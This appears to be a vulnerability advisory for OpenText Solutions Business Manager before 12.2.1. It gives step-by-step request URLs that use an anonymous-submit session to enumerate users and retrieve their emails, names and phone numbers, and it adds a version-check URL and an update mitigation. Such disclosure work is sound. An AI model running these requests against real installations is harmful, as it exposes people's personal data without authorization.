From the project webpage:
OpenText™ Solutions Business Manager is enterprise-scale business process automation software. It helps IT quickly create, adapt, deploy, and govern process-based apps and workflows for humans and systems across the organization.
Summary of the exploit
If the SMB application has anonymous submit enabled on any project, it creates a session for “Anonymous” user upon opening the AnonymousSubmitPage page. This session can be used to enumerate application users and retrieve personal information. Without the Anonymous user session, the vulnerable endpoint throws authentication failure.
Details listed: email address, full name, mobile phone, application role, etc.
Exploit
Step 1: Search for available AnonymousSubmitPage by iterating “projectid” parameter:
https://example.com/tmtrack/tmtrack.dll?AnonymousSubmitPage&projectid=1
Once a project with anonymous submit is found, copy cookies from the response for the next step.
Step 2: Search for users by iterating “userid” parameter:
https://example.com/tmtrack/tmtrack.dll?JSONPage&command=getuserprofilecard&userid=1
Affected versions
<12.2.1
Check version on:
https://example.com/tmtrack/tmtrack.dll?shell=swc&StdPage&template=newwebadmin/aboutwebadmin.xml&noredirect=true
Google dork
inurl
Mitigation
Update to version 12.2.1 or higher.